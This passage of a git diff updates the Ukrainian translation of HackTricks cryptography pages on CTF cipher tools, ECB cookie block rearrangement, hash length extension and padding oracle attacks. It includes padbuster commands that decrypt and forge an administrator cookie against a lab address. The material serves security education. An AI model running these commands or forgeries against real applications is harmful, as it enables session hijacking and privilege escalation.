[https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) -### Morse +### Морзе ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Мертвий: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ### UUencoder ``` @@ -162,7 +163,7 @@ end ### YEncoder -### Український переклад +### Український переклад: ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk @@ -178,6 +179,8 @@ ryvkryvkryvkryvkryvkryvkryvk ``` * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) +### ASCII85 + ### ASCII85 ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> @@ -188,17 +191,17 @@ ryvkryvkryvkryvkryvkryvkryvk ``` drnajapajrna ``` -* [https://www.geocachingtoolbox.com/index.php?lang=uk\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=uk\&page=dvorakKeyboard) +* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard) ### A1Z26 -Букви до їх числового значення +Літери до їх числового значення ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` ### Шифр Афіничного Шифрування -Перетворення літер у числа `(ax+b)%26` (_a_ та _b_ - ключі, _x_ - літера) та повернення результату у вигляді літери +Перетворення літер у числа `(ax+b)%26` (_a_ та _b_ - ключі, _x_ - літера), та результат знову у літеру ``` krodfdudfrod ``` @@ -206,7 +209,7 @@ krodfdudfrod **Multitap** [замінює літеру](https://www.dcode.fr/word-letter-change) на повторювані цифри, визначені відповідним кодом клавіатури мобільного [телефону](https://www.dcode.fr/phone-keypad-cipher) (Цей режим використовується при написанні SMS).\ Наприклад: 2=A, 22=B, 222=C, 3=D...\ -Ви можете впізнати цей код, оскільки побачите\*\* кілька повторюваних чисел\*\*. +Ви можете ідентифікувати цей код, оскільки побачите\*\* кілька повторюваних чисел\*\*. Ви можете розкодувати цей код за посиланням: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) @@ -233,7 +236,7 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ### Bifid -Потрібно ключове слово +Потрібен ключове слово ``` fgaargaamnlunesuneoa ``` @@ -261,7 +264,7 @@ Key: ``` * [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) -### Розподіл секрету Саміра +### Схема секретного ділення Саміра Секрет розбивається на X частин, і для його відновлення потрібно Y частин (_Y <=X_). ``` @@ -271,7 +274,7 @@ Key: ``` [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) -### Перебір паролів з використанням OpenSSL +### OpenSSL brute-force * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) @@ -282,16 +285,17 @@ Key: * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md index 2cf43c391..ae93057b8 100644 --- a/cryptography/electronic-code-book-ecb.md +++ b/cryptography/electronic-code-book-ecb.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # ECB -(ECB) Electronic Code Book - симетрична схема шифрування, яка **замінює кожний блок відкритого тексту** на **блок шифротексту**. Це **найпростіша** схема шифрування. Основна ідея полягає в тому, щоб **розділити** відкритий текст на **блоки по N біт** (залежно від розміру блоку вхідних даних, алгоритм шифрування), а потім зашифрувати (розшифрувати) кожен блок відкритого тексту, використовуючи лише ключ. +(ECB) Electronic Code Book - симетрична схема шифрування, яка **замінює кожний блок відкритого тексту** на **блок шифротексту**. Це **найпростіша** схема шифрування. Основна ідея полягає в тому, щоб **розділити** відкритий текст на **блоки з N бітів** (залежно від розміру блоку вхідних даних, алгоритму шифрування) і потім зашифрувати (розшифрувати) кожен блок відкритого тексту, використовуючи лише ключ. ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) @@ -27,20 +28,20 @@ # Виявлення вразливості Уявіть, що ви увійшли в додаток кілька разів і ви **завжди отримуєте одне й те ж печиво**. Це тому, що печиво додатка має формат **`<ім'я користувача>|<пароль>`**.\ -Потім ви створюєте двох нових користувачів, обоє з **однаковим довгим паролем** та **майже** **однаковим** **ім'ям користувача**.\ -Ви виявляєте, що **блоки по 8 байтів**, де **інформація обох користувачів** однакова, **рівні**. Тоді ви уявляєте, що це може бути через використання **ECB**. +Потім ви створюєте двох нових користувачів, обох з **однаковим довгим паролем** та **майже** **однаковим** **ім'ям користувача**.\ +Ви виявляєте, що **блоки по 8 байт**, де **інформація про обох користувачів** однакова, **рівні**. Тоді ви уявляєте, що це може бути через використання **ECB**. -Подібно до наступного прикладу. Приділіть увагу тому, що ці **2 розкодовані печива** мають кілька разів блок **`\x23U\xE45K\xCB\x21\xC8`** +Подібно до наступного прикладу. Спостерігайте, як у цих **2 розкодованих печивах** кілька разів зустрічається блок **`\x23U\xE45K\xCB\x21\xC8`** ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` -Це тому, що **ім'я користувача та пароль цих файлів cookie містять кілька разів літеру "a"** (наприклад). **Блоки**, які **відрізняються**, - це блоки, які містять **принаймні 1 відмінний символ** (можливо, роздільник "|" або якась необхідна різниця в імені користувача). +Це тому, що **ім'я користувача та пароль цих куків містять кілька разів літеру "a"** (наприклад). **Блоки**, які **відрізняються**, - це блоки, які містять **принаймні 1 відмінний символ** (можливо, роздільник "|" або якась необхідна різниця в імені користувача). -Тепер зловмиснику просто потрібно виявити, чи формат `<ім'я користувача><роздільник><пароль>` чи `<пароль><роздільник><ім'я користувача>`. Для цього він може просто **створити кілька імен користувачів** з **схожими та довгими іменами користувачів та паролями, поки він не знайде формат та довжину роздільника:** +Тепер зловмиснику просто потрібно виявити, чи формат `<ім'я користувача><роздільник><пароль>` чи `<пароль><роздільник><ім'я користувача>`. Для цього він може просто **генерувати кілька імен користувачів** з **схожими та довгими іменами користувачів та паролями, поки він не знайде формат та довжину роздільника:** -| Довжина імені користувача: | Довжина пароля: | Довжина Ім'я користувача + Пароль: | Довжина файлу cookie (після декодування): | +| Довжина імені користувача: | Довжина пароля: | Довжина Ім'я користувача + Пароль: | Довжина куки (після декодування): | | ---------------- | ---------------- | ------------------------- | --------------------------------- | | 2 | 2 | 4 | 8 | | 3 | 3 | 6 | 8 | @@ -52,7 +53,7 @@ ## Видалення цілих блоків -Знаючи формат файлу cookie (`<ім'я користувача>|<пароль>`), для того щоб видаляти ім'я користувача `admin`, створіть нового користувача з ім'ям `aaaaaaaaadmin` та отримайте файл cookie та розкодуйте його: +Знаючи формат куки (`<ім'я користувача>|<пароль>`), для того щоб видаляти ім'я користувача `admin`, створіть нового користувача з ім'ям `aaaaaaaaadmin` та отримайте куку та розкодуйте її: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` @@ -65,14 +66,14 @@ У багатьох базах даних однаково шукати `WHERE username='admin';` або `WHERE username='admin ';` _(Зверніть увагу на додаткові пробіли)_ -Таким чином, інший спосіб підробити користувача `admin` буде: +Таким чином, інший спосіб уособити користувача `admin` буде: -* Створити ім'я користувача таке, що: `len() + len(` створить 2 блоки з 8B. -* Потім створити пароль, який заповнить точну кількість блоків, що містять ім'я користувача, яке ми хочемо підробити, та пробіли, наприклад: `admin ` +* Створити ім'я користувача таке, що: `len() + len(` створить 2 блоки з 8B. +* Потім створіть пароль, який заповнить точну кількість блоків, що містять ім'я користувача, яке ми хочемо уособити, та пробіли, наприклад: `admin ` -Cookie цього користувача буде складатися з 3 блоків: перші 2 блоки - блоки імені користувача + роздільник, а третій - пароль (який підробляє ім'я користувача): `username |admin ` +Cookie цього користувача буде складатися з 3 блоків: перші 2 блоки - це блоки імені користувача + розділювач, а третій - пароль (який фальшиво представляє ім'я користувача): `username |admin ` -**Потім просто замініть перший блок останнім разом і ви підробляєте користувача `admin`: `admin |username`** +**Потім просто замініть перший блок останнім разом і будете уособлювати користувача `admin`: `admin |username`** ## Посилання diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index 2f13739cb..2c82d691e 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -1,34 +1,35 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} # Опис атаки -Уявіть сервер, який **підписує** деякі **дані**, додаючи **секрет** до деяких відомих чітких даних і потім хешуючи ці дані. Якщо ви знаєте: +Уявіть сервер, який **підписує** деякі **дані**, додаючи до відомих чітких даних **секрет** і потім хешуючи ці дані. Якщо ви знаєте: * **Довжину секрету** (це також можна перебрати з вказаного діапазону довжини) * **Чіткі дані** * **Алгоритм (і він вразливий до цієї атаки)** -* **Відоме заповнення** +* **Відоме доповнення** * Зазвичай використовується типове, тому якщо виконані інші 3 вимоги, це також -* Заповнення змінюється в залежності від довжини секрету+даних, тому потрібна довжина секрету +* Доповнення змінюється в залежності від довжини секрету + даних, тому потрібна довжина секрету -Тоді для **зловмисника** стає можливим **додавати** **дані** і **генерувати** дійсний **підпис** для **попередніх даних + доданих даних**. +Тоді для **зловмисника** можливо **додати дані** та **згенерувати** дійсний **підпис** для **попередніх даних + доданих даних**. ## Як? -Основні вразливі алгоритми генерують хеші, спочатку **хешуючи блок даних**, а потім, **з** **раніше** створеного **хешу** (стану), вони **додають наступний блок даних** і **хешують його**. +Основні вразливі алгоритми генерують хеші, спочатку **хешуючи блок даних**, а потім, **з** **раніше** створеного **хешу** (стану), вони **додають наступний блок даних** та **хешують його**. Тоді уявіть, що секрет - "секрет" і дані - "дані", MD5 "секретдані" - 6036708eba0d11f6ef52ad44e8b74d5b.\ Якщо зловмисник хоче додати рядок "додати", він може: @@ -36,7 +37,7 @@ * Згенерувати MD5 з 64 "A" * Змінити стан раніше ініціалізованого хешу на 6036708eba0d11f6ef52ad44e8b74d5b * Додати рядок "додати" -* Завершити хеш і отриманий хеш буде **дійсним для "секрет" + "дані" + "заповнення" + "додати"** +* Завершити хешування, і отриманий хеш буде **дійсним для "секрет" + "дані" + "доповнення" + "додати"** ## **Інструмент** @@ -47,16 +48,17 @@ Ви можете знайти цю атаку добре поясненою за посиланням [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md index e6b3bf6d1..0ed9f2442 100644 --- a/cryptography/padding-oracle-priv.md +++ b/cryptography/padding-oracle-priv.md @@ -1,17 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
- +{% endhint %} # CBC - Cipher Block Chaining @@ -27,10 +27,10 @@ # Доповнення повідомлення -Оскільки шифрування виконується у **фіксованих блоках фіксованого розміру**, **доповнення** зазвичай потрібне в **останньому блоку**, щоб завершити його довжину.\ -Зазвичай використовується **PKCS7**, яке генерує доповнення, **повторюючи кількість байтів**, **необхідних для завершення** блоку. Наприклад, якщо в останньому блоці не вистачає 3 байтів, доповнення буде `\x03\x03\x03`. +Оскільки шифрування виконується у **фіксованих розмірних блоках**, **доповнення** зазвичай потрібне в **останньому блоку**, щоб завершити його довжину.\ +Зазвичай використовується **PKCS7**, яке генерує доповнення, **повторюючи** кількість **байтів**, **необхідних** для **завершення** блоку. Наприклад, якщо в останньому блоку не вистачає 3 байтів, доповнення буде `\x03\x03\x03`. -Давайте розглянемо ще приклади з **2 блоками довжиною 8 байтів**: +Давайте розглянемо більше прикладів з **2 блоками довжиною 8 байтів**: | байт #0 | байт #1 | байт #2 | байт #3 | байт #4 | байт #5 | байт #6 | байт #7 | байт #0 | байт #1 | байт #2 | байт #3 | байт #4 | байт #5 | байт #6 | байт #7 | | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | @@ -43,23 +43,23 @@ # Oracle доповнення -Коли додаток розшифровує зашифровані дані, він спочатку розшифровує дані; потім він видаляє доповнення. Під час очищення доповнення, якщо **недійсне доповнення викликає виявну поведінку**, у вас є **уразливість Oracle доповнення**. Виявна поведінка може бути **помилкою**, **відсутністю результатів** або **повільною відповіддю**. +Коли додаток розшифровує зашифровані дані, він спочатку розшифровує дані; потім він видаляє доповнення. Під час очищення доповнення, якщо **недійсне доповнення викликає виявний вчинок**, у вас є **уразливість Oracle доповнення**. Виявний вчинок може бути **помилкою**, **відсутністю результатів** або **повільною відповіддю**. -Якщо ви виявите цю поведінку, ви можете **розшифрувати зашифровані дані** та навіть **зашифрувати будь-який чистий текст**. +Якщо ви виявите цей вчинок, ви можете **розшифрувати зашифровані дані** та навіть **зашифрувати будь-який чистий текст**. ## Як експлуатувати -Ви можете використовувати [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster), щоб експлуатувати цей вид уразливості або просто виконати +Ви можете використовувати [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster), щоб експлуатувати цей вид вразливості або просто виконати ``` sudo apt-get install padbuster ``` -Для перевірки на вразливість куки сайту ви можете спробувати: +Для того щоб перевірити, чи є куки сайту вразливими, ви можете спробувати: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" ``` **Кодування 0** означає, що використовується **base64** (але доступні й інші, перевірте меню довідки). -Ви також можете **зловживати цією вразливістю для шифрування нових даних. Наприклад, уявіть, що вміст куки - "**_**user=MyUsername**_**", тоді ви можете змінити його на "\_user=administrator\_" та підняти привілеї всередині додатку. Ви також можете зробити це, використовуючи `padbuster`, вказавши параметр -plaintext**. +Ви також можете **зловживати цією вразливістю для шифрування нових даних. Наприклад, уявіть, що вміст куки - "**_**user=MyUsername**_**", тоді ви можете змінити його на "\_user=administrator\_" та підвищити привілеї всередині додатка. Ви також можете це зробити, використовуючи `padbuster`, вказавши параметр -plaintext**: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" ``` @@ -69,12 +69,12 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon ``` ## Теорія -У **короткому** вигляді, ви можете почати розшифровувати зашифровані дані, вгадуючи правильні значення, які можуть бути використані для створення всіх **різних додаткових байтів**. Потім атака на оракула додаткових байтів почне розшифровувати байти з кінця до початку, вгадуючи, яке буде правильне значення, що **створює додатковий байт 1, 2, 3** і т.д. +У **короткому** вигляді, ви можете почати розшифровувати зашифровані дані, вгадуючи правильні значення, які можуть бути використані для створення всіх **різних додаткових байтів**. Потім атака на оракула додаткового байту почне розшифровувати байти з кінця до початку, вгадуючи, яке буде правильне значення, яке **створює додатковий байт 1, 2, 3** і т.д. ![](<../.gitbook/assets/image (629) (1) (1).png>) Уявіть, що у вас є зашифрований текст, який займає **2 блоки**, утворені байтами від **E0 до E15**.\ -Для **розшифрування останнього блоку** (**E8** до **E15**), весь блок проходить через "розшифрування блоку шифру" і генерує **проміжні байти I0 до I15**.\ +Для того, щоб **розшифрувати останній блок** (**E8** до **E15**), весь блок проходить через "розшифрування блоку шифру" і генерує **проміжні байти I0 до I15**.\ Нарешті, кожен проміжний байт **XORed** з попередніми зашифрованими байтами (E0 до E7). Таким чином: * `C15 = D(E15) ^ E7 = I15 ^ E7` @@ -91,15 +91,15 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon Знаючи **C15**, тепер можна **обчислити C14**, але цього разу методом грубої сили додаткового байту `\x02\x02`. -Ця BF така ж складна, як і попередня, оскільки можливо обчислити значення `E''15`, яке дорівнює 0x02: `E''7 = \x02 ^ I15`, тому потрібно лише знайти **`E'14`**, який генерує **`C14`, рівний `0x02`**.\ +Ця BF така ж складна, як і попередня, оскільки можливо обчислити **`E''15`**, значення якого 0x02: `E''7 = \x02 ^ I15`, тому просто потрібно знайти **`E'14`**, який генерує **`C14`, рівний `0x02`**.\ Потім виконайте ті самі кроки для розшифрування C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** **Слідуйте цьому ланцюжку, поки не розшифруєте весь зашифрований текст.** ## Виявлення вразливості -Зареєструйте обліковий запис та увійдіть за цим обліковим записом.\ -Якщо ви **увійдете багато разів** і завжди отримуєте **той самий кукі**, ймовірно, в програмі є **щось не так**. Куки, які надсилаються назад, повинні бути унікальними кожного разу, коли ви увійдете. Якщо куки завжди **однакові**, вони, ймовірно, завжди будуть дійсними, і **немає способу їх інвалідувати**. +Зареєструйте обліковий запис та увійдіть за допомогою цього облікового запису.\ +Якщо ви **увійдете багато разів** і завжди отримуєте **той самий кукі**, ймовірно, у програмі є **щось не так**. Куки, які надсилаються назад, повинні бути унікальними кожного разу, коли ви увійдете. Якщо куки завжди **однакові**, вони, ймовірно, завжди будуть дійсними, і **немає способу їх анулювати**. Тепер, якщо ви спробуєте **змінити** куки, ви побачите, що отримаєте **помилку** від програми.\ Але якщо ви використовуєте BF для додаткового байту (наприклад, використовуючи padbuster), ви зможете отримати інший куки, дійсний для іншого користувача. Цей сценарій ймовірно дуже вразливий до padbuster. @@ -107,18 +107,3 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon ## Посилання * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) - - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану в HackTricks** або **завантажити HackTricks у PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. - -
